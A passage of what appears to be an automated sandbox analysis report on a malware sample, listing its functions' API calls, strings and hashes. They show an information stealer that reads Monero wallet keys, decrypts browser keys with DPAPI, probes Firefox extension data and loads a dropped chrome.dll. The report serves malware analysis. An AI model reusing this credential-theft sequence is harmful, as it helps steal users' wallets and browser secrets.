                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C89C6
                                        • wsprintfA.USER32 ref: 007C89E0
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 8f6b5e484dfb7ab78011eeb4934094bd52f81c5e234ca28d566a5c3a43be0e0f
                                        • Instruction ID: 1eedfa9ad10aa1c5a6ff58fc87d62edd375b60092ed1c5157ccf919d4cfc3150
                                        • Opcode Fuzzy Hash: 8f6b5e484dfb7ab78011eeb4934094bd52f81c5e234ca28d566a5c3a43be0e0f
                                        • Instruction Fuzzy Hash: 0C2130B1A44204EFDB04DFD4DD49FAEBBB8FB48711F10411DF615A7290D775A9018BA1
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007BA098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007C96AE,00000000), ref: 007C8EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C8EF2
                                        • wsprintfW.USER32 ref: 007C8F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BAA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 007BAB2F
                                        • lstrlen.KERNEL32(00000000), ref: 007BADEC
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BAE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD581
                                        • lstrlen.KERNEL32(00000000), ref: 007BD798
                                        • lstrlen.KERNEL32(00000000), ref: 007BD7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BD82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007BD901
                                        • lstrlen.KERNEL32(00000000), ref: 007BDA9F
                                        • lstrlen.KERNEL32(00000000), ref: 007BDAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BDB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007BA664
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,007D1678,007D0D93), ref: 007BF64C
                                        • lstrlen.KERNEL32(00000000), ref: 007BF66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: 961326cbe211d095f0e510f117e3f8ed3f319cf0e2e3a6706965da49bb3858e3
                                        • Instruction ID: 500251240799db1c3c02cfbb1d8991e2f77dee7b5c66fc23c71f76226ce1144b
                                        • Opcode Fuzzy Hash: 961326cbe211d095f0e510f117e3f8ed3f319cf0e2e3a6706965da49bb3858e3
                                        • Instruction Fuzzy Hash: B9511FB191010CFACB04FFA4ED6AEED7339AF54305F40856CF91667191EE386A08CB66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 7c5d2534a1ce81e0e7f8714ce1de5296260586e9fa937494c95a21d77e26d543
                                        • Instruction ID: 952108c9615b75a464e245e09de01b5687fbd3e802184cbf97e9cdb9b9343505
                                        • Opcode Fuzzy Hash: 7c5d2534a1ce81e0e7f8714ce1de5296260586e9fa937494c95a21d77e26d543
                                        • Instruction Fuzzy Hash: 2E411AB1D00209EBCB04EFA4D859FEEB779AF54308F10801DF51676290EB78AA05CBA1
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007BA489
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                          • Part of subcall function 007BA210: LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                          • Part of subcall function 007BA210: LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                          • Part of subcall function 007BA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007BA2D4
                                          • Part of subcall function 007BA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 007BA2F3
                                          • Part of subcall function 007BA2B0: LocalFree.KERNEL32(?), ref: 007BA323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: acf97870d0d616024af0a0a45636db0debd243be5580e749b60bfed98342fbce
                                        • Instruction ID: 89d7daaae48c58bdc49e45b456c547355bc293f048bac2822c963b1f912b9e14
                                        • Opcode Fuzzy Hash: acf97870d0d616024af0a0a45636db0debd243be5580e749b60bfed98342fbce
                                        • Instruction Fuzzy Hash: 8F3130B6D0020DBBCF14EBE4DD46BEE77B8AF58304F444518E902A7241E7399E14CB62
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007D05BF), ref: 007C885A
                                        • Process32First.KERNEL32(?,00000128), ref: 007C886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 007C8883
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • CloseHandle.KERNEL32(?), ref: 007C88F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 633cdc5cda45e0140189842ee633e8fa203718ee469dd064fca3525ce79cf06b
                                        • Instruction ID: cf10513c51e0ff9896fd72068994f2341e65f02a83e20c2fd7b3edfe11f68cab
                                        • Opcode Fuzzy Hash: 633cdc5cda45e0140189842ee633e8fa203718ee469dd064fca3525ce79cf06b
                                        • Instruction Fuzzy Hash: 103148B1901218EBCB24DF95DC59FEEB778EB04705F10419DF10AA22A0DB386E44CFA1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0082FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0082FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 3e2eb72883d0bf8a67c6c4821a66075ce6656665ce707319f42af0aa981a6f6e
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: BB01B936109B35ADFA3526786CC996A26A4FB417B5B314339F216C81F3DF514C81D281
                                        APIs
                                        • __getptd.LIBCMT ref: 007CCA7E
                                          • Part of subcall function 007CC2A0: __amsg_exit.LIBCMT ref: 007CC2B0
                                        • __getptd.LIBCMT ref: 007CCA95
                                        • __amsg_exit.LIBCMT ref: 007CCAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 007CCAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 1abf4ae1f2e8c5b8dd722a984a5954511c53da4d5f7dd9110194f06b75baf9c7
                                        • Instruction ID: 619ebbdd31f5711dc0cef3aa26b18c6bb50abfbb9f8a67bd5fa46ddeb03edd40
                                        • Opcode Fuzzy Hash: 1abf4ae1f2e8c5b8dd722a984a5954511c53da4d5f7dd9110194f06b75baf9c7
                                        • Instruction Fuzzy Hash: C5F09032944219DBD622FBA8980FF5E73A0BF40720F14814EF809A62D2CB2C59418A99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: c2e6d0ba7748e415e6afeea77baf48ec3f3ea56410c46cf790758c437454bdb7
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: F0414871900209AFDF16DF98DC92AEEBBB5FF88304F188199F904B6211D3359A90DF91
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C51CA
                                        • lstrcat.KERNEL32(?,007D1058), ref: 007C51E7
                                        • lstrcat.KERNEL32(?,01658A48), ref: 007C51FB
                                        • lstrcat.KERNEL32(?,007D105C), ref: 007C520D
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4B7C
                                          • Part of subcall function 007C4B60: FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                          • Part of subcall function 007C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                          • Part of subcall function 007C4B60: FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 4bf2a6d62b4b10feca91201fc9389c03e8a8ed58451a8a3b402cc38909b5037e
                                        • Instruction ID: a19bfe7af75a980eb932fdce0a1220b766c3f6ccf5bcbd66df7bca2cc7ef2c44
                                        • Opcode Fuzzy Hash: 4bf2a6d62b4b10feca91201fc9389c03e8a8ed58451a8a3b402cc38909b5037e
                                        • Instruction Fuzzy Hash: 1D21AAF6900208E7DB54FBB0EC96FED333C9B98300F40455DB65556191EE789AC98BA1